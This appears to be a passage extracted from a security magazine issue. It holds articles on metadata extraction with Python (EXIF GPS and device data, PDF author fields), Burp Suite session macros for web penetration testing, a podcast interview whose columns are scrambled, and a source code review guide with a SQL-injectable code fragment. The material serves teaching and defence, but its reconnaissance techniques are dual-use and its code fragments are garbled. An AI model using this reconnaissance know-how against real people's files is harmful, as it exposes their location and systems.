with which you can be attacked. We're talking about metadata.
Metadata is, simply, a set of descriptive information about the files to which they are related. Although this informa-
tion is transparent to the user, it exists and can be a dangerous weapon in the wrong hands.
Metadata can be found in documents, audios, images, videos, etc. In the example that we talked about at the beginning
about social networks, a user could upload images that compromised his privacy, since it could be geolocated from
where the upload was made; model, brand, version and operating system of the device that made the photograph, the
The dangers of metadata
date, and much more information an attacker could use to enrich and prepare his attack. For example, if the attacker
gets the type and version of the user's device, he could investigate which exploits are appropriate to exploit the device’s
vulnerabilities and, thus, achieve its purpose.
So far, we have been talking about the danger that users can run into with the inappropriate use of metadata on the net-
work, but what about organizations? Nowadays, companies also have public social networks or blogs in which to pub-
lish articles, news, promotions, manuals, images of workshops, congresses, etc. If proper precautions are not taken,
anyone with bad intentions can start by easily finding information from their target there, as any oversight can cause
the internal structure of the organization to be obtained, such as internal servers, software, and any useful information
to perform attacks.
Now that you know the meaning of metadata, we will proceed to extract it from PDF documents and images through
scripts made in Python. This programming language has been chosen due to its ease and speed in software production,
while having the necessary libraries to facilitate the work of extraction and analysis of the metadata collected. We’re
talking about Exifread for images and pyPdf for PDF documents.
EXchangeable Image File Format (EXIF) data are those stored in images taken with digital cameras or smartphones,
in other words, photographic metadata. Between them are the ones already mentioned, such as information about the
device (manufacturer, model, brand, etc.), photographic trigger parameters (focal length, sensitivity, orientation, etc.),
geolocation data (length, latitude, altitude, etc.), characteristics of the photo (size, time, etc.), all depending on the de-
vice’s configuration with which the photo is taken. For this reason, the Python Exifread library is used to extract, pre-
cisely, this metadata.
To use Exifread, the first step is to download it using the pip.exe tool.
After that, the script is created, which will get the metadata of the images indicated. Let's first
look at the code to understand its functioning.
First, the main function is described, in which the parameters passed by the command line will be obtained in the
same script execution, that is, the path of the photo to be analyzed and the file where the results will be exposed.
Thanks to the argparse library, it can create an interface to interact easily with the user through the terminal, which
The dangers of metadata
explains how to execute the script to make the correct use of it. Once the user inserts the arguments and they are
stored, the function will be called in charge of obtaining the metadata.
Listing 1
# Main function
# Check arguments
photo to analyze")
args = parser.parse_args()
picture =
file_results = args.filename
detectMetaPhoto(picture, file_results)
The dangers of metadata
if __name__ == '__main__':
The operation of the detectMetaPhoto function will be explained below. It uses the process_file method of the exifread
library to obtain the properties of the file passed by the user, whose organization is established as a dictionary, that is,
a list of key-value pairs. After that, the results are recorded in the file indicated as an argument, which will also be
stored in the results directory (enabled exclusively for this). In this case, the user doesn’t have to create that directory,
the script is in charge of it in case it doesn’t exist. The purpose of storing the metadata in a file and not displaying them
on the terminal is so the user can perform customized searches for specific data.
Listing 2
"""This function will analyze the picture and it will save the results in the
properties_picture = exifread.process_file(image)
if len(properties_picture) > 0:
if not os.path.isdir('results'):
The dangers of metadata
print "\n Metadata catched! The results are in the url \"results\\" + file_res
ults + "\"\n"
except IOError:
print "Error E/S: The file or the url given isn't valid!"
except OSError:
The dangers of metadata
Now that we’ve explained the steps that the tool will give to get the metadata of images, we will proceed to execute the
script as user. It’s necessary to indicate as arguments the path of the photo to be analyzed followed by the file where
the results will be displayed, as you can see below.
Let's analyze below the most outstanding results of the image plazaespaña.jpg, exposed in the file
results_plazaespaña.txt. The image in question is as follows:
The dangers of metadata
The dangers of metadata
Image ImageDescription :
EXIF DigitalZoomRatio : 1
EXIF SubSecTimeOriginal : 68
GPS GPSImgDirectionRef : M
EXIF ColorSpace : sRGB
EXIF FocalLength : 7/2
Image Model : VFD 700
Image XResolution : 72
Image Make : Vodafone EXIF WhiteBalance : Auto
EXIF SubSecTimeDigitized : 68
Thumbnail ResolutionUnit : Pixels/Inch
Image YResolution : 72
GPS GPSLongitudeRef : W
Interoperability InteroperabilityIndex : R98
EXIF ExposureBiasValue : 0
GPS GPSAltitude : 8
Thumbnail Orientation : Horizontal (normal)
The most relevant data that may interest an attacker are those previously indicated: GPS information, model and mark
of the device with which the image was taken. The first of these has been obtained thanks to the fact that, at the time
the photography was taken, the smartphone’s GPS was activated. For this reason, if you want to prevent this data from
being recorded in the image, deactivate the GPS locator before taking the photo or, if not, use devices without an inter-
net connection, such as cameras. Looking for the coordinates obtained in the metadata in Google Maps, for example,
the location where the photograph was taken is easily obtained.
The dangers of metadata
After that, it can perform a search about the vulnerabilities that the device presents and available exploits with which
to make an attack. An example of this can be the web, a repository of vulnerabilities val-
ued from minor to major gravity. At the same time, you can also consult another database about exploits, which can be
searched for the particular device, such as the web At this point, it would be interesting
to know how the applications treat the uploaded images, that is, if they remove metadata or not.
Let's start with one of the most used, Facebook. Uploading the same photograph to the social network and download-
ing it later to analyze it, it gives the following result:
As you can see, Facebook removes the metadata of the images uploaded, thus increasing the security of its users. The
next application to test will be WhatsApp. It performed two experiments: the first is to download the profile picture of
a contact and the second will be receive an image made with GPS so that, in case of obtaining metadata, to know the
location of the contact that sent us the photograph. However, it’s again possible to conclude that WhatsApp protects
its users, since it removes the metadata of both cases.
Image 7. Profile image and image downloaded from WhatsApp without metadata
The dangers of metadata
On Twitter, Instagram and LinkedIn, it’s more of the same: all of them remove the metadata of the images that users
upload to not reveal information about them. However, downloading images on YouTube, such as the profile, can save
some metadata, although they aren’t very relevant to an attacker. YouTuber’s profiles have been randomly selected
and their photos have been saved to analyse. There have been two series of results with the same characteristics:
The previous metadata, as you can see, are parameters with little information to be able to make an attack and, in addi-
tion, they are the characteristics that Google gives to the image format.
Finally, a test has been carried out where an email has been sent with the analyzed photograph previously attached
through Gmail, and the result of a new analysis is identical: it contains all the metadata, without any exception.
So it’s important to know to whom you send or publish something as simple as a photograph, since it can reveal details
about you, or worse, your organization, since you not only put yourself at risk, but the whole company.
Once we’ve seen the possible effects to sharing a file with metadata, it will be exposed how to delete them to eradicate
any risk, thus increasing the safety of users. In addition to its removal, it is important to make sure that GPS is dis-
abled on devices with geolocation.
It has been seen that the most used social networks do use this protection, but they won’t always have to be through
these means the sharing of files, but it can be as easy as lending a pendrive, uploading a university job to a web portal
and countless possible cases.
Through Windows 10, most metadata can be removed from the images in a few simple steps.
The first step to do is select the photos. After that, open the properties window and then the Details tab. At the end,
click on the Remove Properties and Personal Information link. Once there, you will get a window like the following
The dangers of metadata
Two options can be seen. The first one deletes all possible properties but not to the original photo, it makes a copy in
which it applies those changes. That is, you would have two photographs: the original intact and the copy without meta-
data. The second option allows you to choose which data are the ones that you want to eliminate from all the possible
ones. There are some of them that can’t be removed in any of the two options, such as the image's own data, i.e. name,
extension, date, dimensions, attributes, owner, etc., that is, few data relevant to an attacker. However, the device with
which it was taken and geolocation data can be removed without any problems.
The option chosen for the example was the first. To see the results, the created copy has been analyzed, leaving the fol-
lowing result:
GPS GPSAltitudeRef : 0
Image DateTime : 2017:02:05 15:46:07
GPS GPSProcessingMethod : [65, 83, 67, 73, 73, 0, 0, 0, 71, 80, 83, 0, 0, 0, 0, 0,
0, 0, 0, 0, ... ]
EXIF ExifImageWidth : 4160
Thumbnail YResolution : 72
EXIF SubSecTime : 68
Interoperability InteroperabilityVersion : [48, 49, 48, 48]
GPS GPSDate : 2017:02:05
Image Orientation : Horizontal (normal)
Image YCbCrPositioning : Co-sited
The dangers of metadata
The dangers of metadata
EXIF InteroperabilityOffset : 865
Thumbnail JPEGInterchangeFormat : 1326
EXIF FNumber : 11/5
EXIF ExifImageLength : 3120
Image ResolutionUnit : Pixels/Inch
Thumbnail YCbCrPositioning : Co-sited
GPS GPSVersionID : [2, 2, 0, 0]
Thumbnail XResolution : 72
Image GPSInfo : 895
Thumbnail JPEGInterchangeFormatLength : 14375
EXIF ExposureMode : Auto Exposure
Thumbnail Compression : JPEG (old-style)
Image Tag 0x0225 :
Image Tag 0x0224 : 1
Image Tag 0x0221 : 0
Image Tag 0x0220 : 0
Image Tag 0x0223 : 0
Image Tag 0x0222 : 0
EXIF UserComment : e_mode":"PhotoModule","faces":[]}
EXIF SceneCaptureType : Standard
GPS GPSTimeStamp : [14, 44, 31]
Image ImageDescription :
EXIF DigitalZoomRatio : 1
GPS GPSImgDirectionRef : M
EXIF ColorSpace : sRGB
EXIF FocalLength : 7/2
GPS GPSImgDirection : 222
Image XResolution : 72
EXIF ExposureTime : 661/1000000
Thumbnail ResolutionUnit : Pixels/Inch
Image YResolution : 72
Interoperability InteroperabilityIndex : R98
EXIF ExposureBiasValue : 0
Thumbnail Orientation : Horizontal (normal)
It’s noted, there is no relevant data to give extra information to malicious users, something that did not happen in the
image before removing the metadata. However, it’s not only possible to find metadata in images as we have seen, but
in any file.
Extraction of metadata from PDF documents
As mentioned above, PDF documents are another metadata extraction point. For this purpose, a script has been made,
again in Python, with which the metadata contained in this type of files will be analyzed and extracted.
In this case, the used library will be pyPdf, as already mentioned before. With it you can encrypt, decrypt, extract infor-
mation and modify the format of PDF documents and, like Exifread, the results are organized in key-value pairs.
For the use of pyPdf the first thing to do is to download it using the pip.exe tool.
After that, the script is created, which will give you the metadata of the PDF files you are given. It’s
possible thanks to the detectMetaFilePDF function, which uses the PdfFileReader method of the pyPdf library to open
the PDF file passed by the user, as well as getDocumentInfo to obtain its properties, whose organization is established
as a dictionary, that is, a list of key-value pairs. After that, the results are recorded in the file indicated as an argument,
which will also be stored in the results directory.
The part of code belonging to the above description is presented below.
Listing 3
"""This function will analyze the PDF document and it will save the results in the txt
file, both passed as arguments """
properties_file_pdf = file_pdf_analized.getDocumentInfo()
if len(properties_file_pdf) > 0:
if not os.path.isdir('results'):
The dangers of metadata
print "\n Metadata catched! The results are in the url \"re
sults\\" + file_results + "\"\n"
except IOError:
print "Error E/S: The file or the url given isn't valid!\n"
except OSError:
The dangers of metadata
Now that we’ve explained the steps that the tool will give to get the metadata of images, we will proceed to execute the
script as user.
The above image shows the example of a successful execution, since the submitted document had metadata to be ana-
lyzed. They can be found in the file located in the path indicated by the resulting message. The results obtained were
the following for this specific case:
/Subject : None
/Producer : [ClibPDF Library 2.02-r1-2] Linux
/Title : Microsoft Word - grades
/Creator : A ClibPDF program
/Keywords : ClibPDF
/Author : User: Administrador Apache con PHP [admwww]
/CreationDate : D:20161221093049
As it can be seen in the previous example, the most relevant data obtained is the operating system of the machine used
by the user. With this information the attacker is feeding on details about the user with which to attack him, so it
would be important to take precautions, especially if the document is to be uploaded to a website or internet blog or
sent via email. In addition, you can also find the author, title, keywords and subject (among others) that can be added
by the user who created the PDF document, while other properties can be generated automatically. This way, if we
want to upload a document anonymously or make illegal actions, like copying files, for example, it’s important to re-
view what hidden information can be revealed without your knowledge, as it can be used against you.
To eliminate the metadata in this type of file you can make use of the Pro version of Adobe Acrobat. However, if you do
not have it, there are several programs that already do it for various operating systems, such as BeCyPDFMetaEdit for
In conclusion, any document, like audios, videos, images or documents, has information that users ignore and, in the
wrong hands, can be harmful to them.
Although many of the most used social networks today are in charge of improving security in this aspect, it would be
important to raise the awareness of users about the dangers of recording the metadata in their files. In this way, if the
user has oversight of a website (for example, sharing a political party's release) leaving the metadata can cause the com-
petition to use it against them. If you send emails with attachments to people in whom you don’t fully trust (for exam-
ple, sending the statement of a teacher's work to his students may cause that resentful student to extract information
The dangers of metadata
to use against the teacher), or make anonymous complaints through the network or share images, for example, the
user shouldn’t worry if he takes precautionary measures before using the files, such as disabling GPS on internet de-
vices before taking pictures or removing metadata from files.
Harnessing the lesser known
“Burp macros” for Penetration
Testing Web Apps
by Samrat Das
Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps
In my penetration testing career so far, while performing fuzzing of parameters and page field in web applications, I
did encounter some challenges relating to session handling.
In multiple cases, the application used to terminate the session being used for testing, this either happened due to
some security countermeasures (for example: getting unsafe input, the session used to get logged out) or in other
cases, say the Burp spider/ crawler used to fuzz the logout page parameters and terminate the session.
In such cases, further scans, probes and requests become unproductive, since you have to perform a re login and re-
establish the session of the application.
I used to do this manually and it was a bit cumbersome. While trying to find a work around, I was going through the
Burp Suite functions and based on my curiosity, I noticed Burp's session handling functionality.
After probing around the options, I came to the idea backed by some online research that Burp takes care of the above
challenges with some rule based macros.
In simple words, say if fuzzing parameters leads to termination of session, Burp can auto login the app with the creden-
tials, and continue scanning and crawling itself.
I am sure experienced testers already know this. However, for the newbies and the yet to learn people, I wrote this
short tutorial which will give a step by step of how to use Burp's session handling rules to ensure you remain logged in
to an application when using Burp Spider or Scanner.
Things needed:
➡ Any website that has session handling (I am showing using the classic
Step 1:
Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps
Step 2:
At this point, I am simply keeping the interception off in Burp Suite and putting the credentials here to perform a
Step 3:
Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps
Step 4:
Now, in order to test the session handling, we can send this page request to Burp’s repeater tab and by removing the
cookies have a look if the session is terminated due to session breaking.
Step 5:
We can see that the page session is working since we have a proper session. Let’s try to remove the cookies and test
Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps
Step 6:
As we can see, the session gets logged out and we need to log back in again to continue testing.
Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps
Step 7:
Navigate to: Project Options -> Sessions -> Session Handling Rules
Step 8:
Here we can see that there is a default rule – Use cookies from Burp’s cookie jar.
Step 9:
Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps
Step 10:
Put a rule description that suits you and under rule actions, select “Check session is valid”.
Step 11:
Once you click OK, the session handling editor will fire up which will show the default: Issue current request. Leave as
it is and scroll down to “if session is invalid, perform the following action”.
Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps
Step 12:
Tick the if session invalid and click on add macro. At this point, you will get a Macro Recorder which has all the proxy
history. Click and select the page which has the login credentials and performs a login. Click OK.
Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps
Step 13:
Once you click OK, the Macro editor will fire up and you can name it with a custom name, as well as have options to
simulate the macro, re-record, re-analyse.
Step 14:
Before running a test, configure the parameters to identify if Burp has captured the test parameters correctly.
Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps
Step 15:
Since here all is set, we can perform a run of test macro post, click OK.
Step 16:
Now click on final scope and set the URL Scope to all urls / suite scope/ custom scope to guide the macro where to
Step 17:
I leave it include all URLs here. Let’s now head over to repeater again to test our macro.
Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps
Step 18:
Take a look, we are trying to access the main page without cookies in repeater tab:
Step 19:
Once we hit go, the cookies will automatically get added to the request and the page will load up!
Harnessing the lesser known “Burp macros” for Penetration Testing Web Apps
So that’s it. It’s a sweet and simple way to show how Burp is useful for creating session based rules and macros. You
can explore it further by using cookie jar/ Burp extender and lots of other options! Happy experimenting!
“Python developers are such a large and
diverse group, how could they not have a
Me Podcast
Michael is the founder and host of Talk Python To Me, a weekly podcast about Python
He is an instructor and author for DevelopMentor, co-founder of their online learning plat-
Usually, you can find him in his hometown of Portland, OR. But for much of 2015 and
our readers something about yourself? support and encouragement. It was really gratifying
very open and welcoming group. That makes for a Next, I launched an online training company called Talk
When I launched it, I was happy with the first few epi- ket? Can I attract enough people who will pay for it?
Michael Kennedy, the creator of Talk Python To Me Podcast
ing. It let me discover that I was really on to something “I’m so happy you started the podcast. I enjoy my day
and it only took a few days to verify that. That's worked to day programming much more since I started listen-
really well for me and the potential students who get a ing. So I decided to back your course.”
You can see more about the Kickstarter at guys and girls.
For me personally, I saw the Kickstarter from the begin-
ning as a way to launch something much bigger than
[H9]: Tell us more about your Kickstarter campaign? just one course. I laid out the plan in my blog post and
What is the project about? on the podcast but basically I’ve dedicated myself to
The project itself is about creating an uncommon type good place to start in terms of course authoring.
ture of covering the language details. The course is Then I’m thinking, why not another Kickstarter for the
called Python Jumpstart by Building 10 Apps. That’s next course? The students benefit because they get
what the Kickstarter rewards are promising, for the early access and 50% off the list price. I benefit be-
most part, and what the students get. cause it let’s me collect feedback right away rather than
as a chance to say thanks for the podcast in addition to If this resonates with you, I encourage you to check out
taking a course. I’ve gotten many messages from back- the documentary on Kickstarter (which itself was funded
Michael Kennedy, the creator of Talk Python To Me Podcast
on Kickstarter of course) called Capital C: That evening when my kids and wife went to bed, I
[MK]: I had wanted to started a podcast for years, but bought the domain name, setup hosting, everything.
the areas I felt qualified were really crowded. If I was Then, I started scheduling guests and crossed my fin-
As I got into Python more and more, I went in search of ration is both a superpower and yet perishable. I love
several podcasts I could listen to and help broaden my this quote from Jason Fried (cofounder of 37Signals):
Jason Fried
There had been approximately six general Python pod-
casts, but none of them had released an episode for
al )
over a year. To be honest, I was dumbfounded.
find it? If you look at the TIOBE index which tracks pro-
Michael Kennedy, the creator of Talk Python To Me Podcast
[H9]: How long did that last? And what happened That's pretty dull and over an audio format it's deadly in a mad flurry of creation. I have "First you call x, then y. We tried this other way but dur-
polished the website and whatnot continuously but it’s ing the cyber monday crunch we found it didn't scale.
surprisingly similar to the original. The website crashed. We lost $2 mill in revenue and
recordings. I wasn’t great at the beginning but every That's worth listening to and sharing with your friends.
That was a nerv- [MK]: The guests have been amazing. I've really en-
ous day, but the joyed speaking to each and every one of them and I've
been great.
There are a few guests who I invited to the show be-
[H9]: Do you cause they are making a dent in the (Python) universe.
sometimes to talk about strictly technical stuff and that is way more important than name recognition. If
keep it from disrupting the flow of the podcast? you can get both, even better. But story trumps popu-
larity in my book.
[MK]: Not really. I think it's important to humanize tech-
nology, to tell the story of technology. When I interview [H9]: Can you tell us about the most interesting con-
people I try to weave the technical bits into the story versation you had?
"here's the api, first you call x, then y, then you get z"
Michael Kennedy, the creator of Talk Python To Me Podcast
Justin Seitz and I spoke about Python Cybersecurity [H9]: Any unusual or embarrassing experience you
[MK]: Surprisingly, not really. I've definitely asked some
security-and-penetration-testing ). I think this conversa-
stupid questions or missed a chance to follow a really
tion is really relevant to your readers and it gave me a
interesting thread because I'm thinking too much about
chance to peer into a world that is very different than
where the conversation might go rather than just listen-
most software developers get to see. Justin and I had a
lot of fun and I learned a bunch from it. Although I'm a
little concerned about connecting to the Internet after I'd say the stuff that is embarrassing really is more low-
this chat! grade fumbling over words and such. But I edit that
stuff out.
I spoke with Kyle Cranmer from the Large Hadron Col-
lider at CERN about how they are using Python and its [H9]: You’ve committed one of your episodes en-
role in discovering the Higgs Boson (a discovery which tirely to Python in penetration testing. Is security a
won the PIs on there the Nobel Prize). The chance to topic that comes up more often?
Leah Culver and I discussed Investing and building start- ble pieces of user feedback was this tweet:
ups-and-investing )
[MK]: Every time I think I do have a favorite, I'm sur- influence your podcast?
I'd say it's about 5-7 hours per episode of work. Usually
Michael Kennedy, the creator of Talk Python To Me Podcast
I'm excited to do it. But some weeks, I'm busy, tired, [H9]: Do you have any advice for people who want
have deadlines, etc. Knowing listeners really appreciate to start their own podcasts? What should they do?
I would say about half the topics and guests on the have to have it all planned out. Don't worry about your
show are direct listener recommendations including 100th episode. Do 10 and the listeners will let you
[H9]: Were you surprised about some aspects of the Don't worry about sponsorships or monetization. One
community that formed around the podcast? of two things will happen. Either it'll be popular and
My background has been in Mathematics and pure said, podcasts are increasingly viable as businesses in
After the data science shows #31 (scikit-learn) and #40
(top 10 data science stories of 2015), many data scien- Had I decide that a "software developer podcast" had
tists started tuning in. a much larger audience than Python-only developer
Michael Kennedy, the creator of Talk Python To Me Podcast
This "niching down" concept is a little counterintuitive, but we live in an overabundance of information and a scarcity
of attention. You win that attention by being just what people are looking for.
Get a good microphone - it makes a big difference. I use a Yeti Pro but have also heard good things about the Rode
Finally, if you start a podcast it will change your career. You will make connections and have conversations you never
[H9]: Do you have any thoughts or experiences you would like to share with our audience? Any good advice?
[MK]: Get inspired and harness that inspiration for all it's worth. If you are really inspired and act upon it, you can cre-
ate something amazing in a really short time. If you put it off, it'll expire.
Start small and focused. You don't have to change the world all at once. I've heard the story over and over from my
guests. They started some small thing that was cool. It grew and opened new doors. They kept leveling up. Now
they are doing amazing things like particle physics, startups, hugely successful open source companies and more.
Talk Python to Me is a weekly podcast hosted by Michael Kennedy. The show covers a wide array of Python
topics as well as many related topics (e.g. MongoDB, AngularJS, DevOps). The format is a casual 30 minute
Source Code review
by Atul Singh
Source Code review is a process which discovers hidden vulnerabilities, design flaws, and verifies if key security con-
trols are implemented. Code review helps developers learn the code base, as well as help them learn new technologies
and techniques that grow their skill sets.
In source code review, we are using a combination of scanning tools and manual review to detect insecure coding prac-
tices, backdoor, injection flaws, cross site scripting errors, insecure handling of resources, weak cryptography, etc.
Many claim that this process is time consuming and too costly, but there is no doubt that this process is the fastest and
most accurate way to find and diagnose many problems, mostly your code is the base from which hackers are taking
advantage. There are dozens of security problems that simply can’t be found any other way. A source code review is
also the best way to detect intentional or accidental backdoors and logic bombs in applications that you acquire from
third parties or develop in house. Certain security standards (such as OCI DSS) demand that a source code review is
conducted prior to production usage of software to identify the potential coding vulnerabilities.
A code review can reveal issues such as common bugs, thread synchronization, dealing with error conditions, correct
accounting for reference-counting and other potential resource leaks, security problems, and ensuring that unit tests
cover all code paths, error cases, and limit cases.
‣ Testing is carried out by application security experts in various application technologies and platforms.
‣ Following industry best practices and guidelines such as the web application security project (OWASP), the
Web Application Security Consortium (WASC) and open source security testing methodology manual
‣ High emphasis on manual verification along with automated tools (open source and commercial) based testing.
‣ Vulnerability correlation facilitates in verification of automated and manually identified vulnerabilities and
eliminating false positive.
Source Code review
A secure code review focuses on seven security mechanisms. An application that is weak in any area already makes it-
self a target for a hacker. These seven security mechanisms are:
1. Authentication
2. Authorization
3. Session management
4. Data validation
5. Error handling
6. Logging
7. Encryption
‣ In a manual review, the reviewer reads each and every line of the code and analyzes it for potential flaws.
‣ Security issues like Authentication, Authorization and session management can be better detected manually.
‣ Ability to deep dive into the code paths to check for logical errors and flaws in the design.
‣ Requires an expert of both the languages and the frameworks used in the app, as well as a deep knowledge of
‣ Manual testing is not consistent. Different reviewers will produce different reports, resulting in inconsistent
findings between reviewers.
‣ Automated tools finish a lot faster than manual testing, by orders of magnitude.
Source Code review
‣ Depending on tool choice, an automated source code review tool can be customized per organizational needs,
especially certain compliance standards, and for high-value applications.
‣ Automated tools cannot test for business logic flaws; they hunt the technical flaws only - and the more common
ones, at that.
‣ On the other hand, automated tools will only get updated once every while, but a human can learn about a
spanking new technique and implement it the very next day.
‣ Automated tools usually include a very high percentage of false positives (from 30% to over 90%, depending on
the methodology and choice of product).
‣ Phase 1 – Run all available code-analysis tools. Multiple tools should be used to offset tool biases and mini-
mize false positives and false negatives. Analysts should pay attention to every warning or error. Warnings
from multiple tools may indicate that the code that needs closer scrutiny (e.g. manual analysis). Code should be
evaluated early, preferable with each build, and re-evaluated at every milestone.
‣ Phase 2 – Look for common vulnerability patterns. Analysts should make sure that code reviews cover the
most common vulnerabilities and weaknesses, such as integer arithmetic issues, buffer overruns, SQL injec-
tion, and cross-site scripting (XSS). Sources for such common vulnerabilities and weaknesses include the Com-
mon Vulnerabilities and Exposures (CVE) and Common Weaknesses Enumeration (CWE) databases, main-
tained by the MITRE Corporation and accessible at: and – MI-
TRE, in cooperation with the SANS Institute, also maintains a list of the “Top 25 Most Dangerous Program-
ming Errors” ( that can lead to serious vulnerabilities. Static code
analysis tools and manual techniques should, at a minimum, address these Top 25.
‣ Phase 3 – Dig deep into risky code. Analysts should also use manual analysis (e.g. code inspection) to more
thoroughly evaluate any risky code that has been identified based on the attack surface, or based on the heuris-
tics below. Such code review should start at the entry point for each module under review and should trace data
flow through the system, evaluating the data, how it’s used, and if security objectives might be compromised.
‣ Use Checklist: It´s very likely that each person on your team makes the same 10 mistakes over and over.
Omissions, in particular, are the hardest defects to find because it´s difficult to review something that isn´t
there. Checklists are the most effective way to eliminate frequently made errors and to combat the challenges of
omission finding.
Source Code review
‣ Practice lightweight code reviews: To fully optimize your team´s time and to effectively measure its re-
sults, a lightweight, tool-assisted process is recommended. According to the study, lightweight code review
takes less than 20% the time of formal reviews and finds just as many bugs! Formal, or heavyweight, inspection
averages nine hours per 200 LOC (Line of Code). While often effective, this rigid process requires up to six par-
ticipants and hours of meetings, paging through detailed code printouts.
‣ Highlight issues in the code: Never force software developers to change the code written by them. It may
hurt their ego and they may repeat the same mistake if they do not understand the reason behind code change
recommendation. Highlight the issues in the existing code and its consequences.
‣ Do a few things offline: Instead of explaining the entire solution to developers during the code review proc-
ess, simply share the links of relevant websites or encourage them to research on the internet by providing key-
words. This action would certainly save the code reviewer’s time and energy. And of course, developers would
also like it, since they too need some time to assimilate the proposed solution.
‣ Always be patient and relook if required: Sometimes, developers do not accept suggestions/
recommendation and keep debating. A code reviewer many not know the exact context and challenges, when
the code was written. A code reviewer should understand all the points being made by the developer without
losing patience. Furthermore, to make the point crystal clear, a code reviewer can explain the points on paper
or on a whiteboard by comparing the developer’s approach vs. code reviewer’s approach. Every approach has
its pros and cons, so you need to choose the right approach, whichever weighs more after careful evaluation.
‣ Explain the need for best coding practice: Generally, software developers mention that best coding prac-
tices are not followed due to tight project schedules. Developers may feel that it is an acceptable practice. How-
ever, code reviewers should educate software developers that as the code size increases, or after some time, the
application becomes very difficult to maintain. Moreover, if a client verifies the code then poor quality code
may give the wrong impression on the team’s/organization’s quality standards. It may also impact awarding
new projects or referring an organization to prospective clients.
‣ Document all code review comments: Document all code review comments in an email, Word document,
Excel, or any standard tool used by the organization. Making a mistake for the first time is acceptable, but it is
not a good sign to repeat the same mistake. The code review document helps software developers to cross check
the highlighted issues and avoid making similar mistakes in future. Additionally, maintaining a code review
document is a mandatory part of the Capability Maturity Model Integration (CMMI) level process.
‣ Establish a process for fixing defects found: The best way to ensure that defects are fixed is to use a col-
laborative code review tool that allows reviewers to log bugs, discuss them with the author, and approve
changes in the code. Without an automated tool, bugs found in review likely aren´t logged in the team´s usual
defect tracking system because they are found before code is released to QA.
Source Code review
‣ Find vulnerabilities in context of the application: Not only should you pick up real and applicable vul-
nerabilities in the context of the application – as it decreases the number of issues – but also, you should pro-
pose the countermeasures in the report. That makes developers happy and confident. The scanner may flag any
issue as High, Medium or Low. It’s your responsibility to give them appropriate ranking based on the applica-
tion’s context.
‣ Train them: Last but not least, train developers about the vulnerabilities in the real world. Give them train-
ing, involve them and encourage them to review their code before production. Tell them how it saves effort and
money. If you have a scanning tool that supports plug-ins for IDE, install it at their machines so that they can
do proper development and a hand by hand review.
A Sample Illustration:
username = s.getParser().getRawParameter(USERNAME);
password = s.getParser().getRawParameter(PASSWORD);
ec.addElement(new StringElement(query));
The inputs from the user are requested through getRawParameter, and assigned to the ‘username’ and ‘password’ vari-
ables. Again, they are being used directly in the SQL query without any input validation and also being embedded into
Source Code review
the dynamic query. Any malicious user can tamper with this query to run his own arbitrary SQL codes. So if we try to
find all the entry points into the codebase (getRawParameter in this case), we may detect injection flaws. Even if we
search for SQL queries being used in the code, if we find that they are being used as dynamic queries, they may be a
case of a possible SQL injection.
If weaknesses are discovered in the source code, then they usually need to be documented. The documentation serves
as a basis for the correction and addressing of the discoveries.
It is important that the affected parts of code are referenced as exactly as possible. Ideally, the following data points
are used:
In addition to that, you could retype the entire code block directly so that a check and referencing is made even easier.
Further information concerning the weakness (classification, description, scenario of attack, example of exploit) adds
additional quality to the report. Ideally, there’s even a suggestion for a countermeasure. And even more ideally, that
countermeasure can be expressed in functional code, because then you’re presenting a solution that is as viable as it
A secure code review is not a silver bullet and performing such a review does not mean that every instance of a security
flaw will be discovered. Rather it is one of many different types of activities that can help increase the quality of an ap-
plication and reduce the number vulnerabilities in software, making it more difficult for a malicious user to exploit.
Open Source or Free Tools of This Type (Reference: OWASP Source Code Analysis Tools)
‣ Brakeman - Brakeman is an open source vulnerability scanner specifically designed for Ruby on Rails applica-
‣ Codesake Dawn - Codesake Dawn is an open source security source code analyzer designed for Sinatra, Padrino
for Ruby on Rails applications. It also works on non-web applications written in Ruby.
Source Code review
‣ FindSecBugs - A security specific plugin for FindBugs that significantly improves FindBug's ability to find secu-
rity vulnerabilities in Java programs.
‣ Google CodeSearchDiggity - Uses Google Code Search to identify vulnerabilities in open source code projects
hosted by Google Code, MS CodePlex, SourceForge, Github, and more. The tool comes with over 130 default
searches that identify SQL injection, cross-site scripting (XSS), insecure remote and local file includes, hard-
coded passwords, and much more. Essentially, Google CodeSearchDiggity provides a source code security
analysis of nearly every single open source code project in existence – simultaneously.
‣ PMD - PMD scans Java source code and looks for potential code problems (this is a code quality tool that does
not focus on security issues).
‣ PreFast (Microsoft) - PREfast is a static analysis tool that identifies defects in C/C++ programs. Last update
‣ RIPS - RIPS is a static source code analyzer for vulnerabilities in PHP web applications. Please see notes on the site.
‣ SonarQube - Scans source code for more than 20 languages for bugs, vulnerabilities, and code smells. Sonar-
Qube IDE plugins for Eclipse, Visual Studio, and IntelliJ provided by SonarLint.
‣ VisualCodeGrepper (VCG) - Scans C/C++, C#, VB, PHP, Java, and PL/SQL for security issues and for com-
ments which may indicate defective code. The config files can be used to carry out additional checks for banned
functions or functions which commonly cause security issues.
‣ Xanitizer - Scans Java for security vulnerabilities, mainly via taint analysis. The tool comes with a number of
predefined vulnerability detectors which can additionally be extended by the user.
Commercial Tools of This Type (Reference: OWASP Source Code Analysis Tools)
‣ bugScout (Buguroo Offensive Security) Latest generation source code analysis tool bugScout detects source
code vulnerabilities and makes possible an accurate management of the life cycles due to its easy use.
‣ Codacy is free for open source projects, and integrates with tools such as Brakeman, Bandit, FindBugs, and a
number of others. It offers security patterns for languages such as Python, Ruby, Scala, Java, Javascript and
Source Code review
‣ Contrast from Contrast Security Contrast performs code security without actually doing static analysis. Con-
trast does Interactive Application Security Testing (IAST), correlating runtime code & data analysis. It provides
code level results without actually relying on static analysis.
‣ CxSAST (Checkmarx)
‣ Fortify (HP)
‣ KlocWork (KlocWork)
‣ Kiuwan - SaaS Software Quality & Security Analysis (an Optimyth company)
‣ Seeker (Synopsys) Seeker performs code security without actually doing static analysis. Seeker does Interactive
Application Security Testing (IAST), correlating runtime code & data analysis with simulated attacks. It pro-
vides code level results without actually relying on static analysis.
Wireless Hacking Tools
by Souvik Mal
